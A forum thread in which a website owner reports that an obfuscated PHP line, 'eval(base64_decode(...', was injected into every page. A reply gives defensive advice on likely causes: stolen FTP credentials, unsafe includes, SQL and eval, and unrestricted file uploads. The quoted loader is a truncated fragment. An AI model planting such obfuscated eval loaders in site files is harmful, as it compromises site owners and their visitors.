I Found a problem on my site and when i compare the files on the server with my local files i found that every page (*.js or *.php) has this line on it
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC
or a javascript line

so i knew that my site has been hacked..
so
1 - i want to know how to prevent anyone to hack my site?
i made on every textfield or textarea on posting or getting it the htmlspecialcharacter($_POST['name'])

is this true? and can it help me?
2- how did anyone hack my site??
3- how i can know what does this code mean???

Help me please.

Hey.

The htmlspecialchar function is meant to be used when printing unsafe data to a HTML page.
It doesn't protect you if you use the data for other things, such as SQL queries or shell scripts.

Hard to tell. Especially since we know absolutely nothing about your website.

Most likely suspects:

• Your FTP info was stolen from a PC you were working on.
  Developers often use FTP applications that store login details for them so they don't have to type it in every single time.
  Some viruses target such applications, giving the attacker access to your FTP server.
  (Please note that these sort of viruses are designed to be invisible. And yes, you can have one. Doesn't matter how protected you think you are.)
• Dynamic includes/SQL/eval/shell scripts. All of these can be used to gain unautorized access to your server if they are created using unsafe data. A common newbie mistake is to add un-escaped user input into SQL queries, which allows a hacker to alter the command via your own web-form.
  (See SQL Injection)
• Broken file upload scripts, which allow malicious users to upload scripts onto your site. Always take care to limit file uploads to know types, or a malicious user could just upload a PHP file and execute it via a normal web-request.

This just prints the command that the eval() call you posted is supposed to execute.